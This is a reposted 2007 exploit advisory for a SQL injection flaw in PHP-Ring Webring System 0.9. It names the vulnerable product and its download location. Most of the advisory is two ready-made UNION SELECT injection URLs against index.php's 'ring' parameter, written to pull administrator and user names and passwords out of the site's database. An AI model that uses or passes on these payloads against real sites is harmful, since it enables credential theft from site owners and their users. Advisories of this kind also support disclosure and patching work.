Security Advisory: PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability
  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability
  GPB bulletin board Remote file include
  AWBS v2.4.0 Remote file include[cart2.php]

From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 30.04.2007
Subject: PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

                                                    Y! Underground Group
       http://2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   uPHP_ring_website
Download.....:   http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........:   Sql Injection Attack
Author.......:   Dj7xpl / dj7xpl@2600.ir
HomePage.....:   http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

index.php?ring=Sql.Inject

index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,
admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,
3/**/FROM/**/ring_users/*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]

test server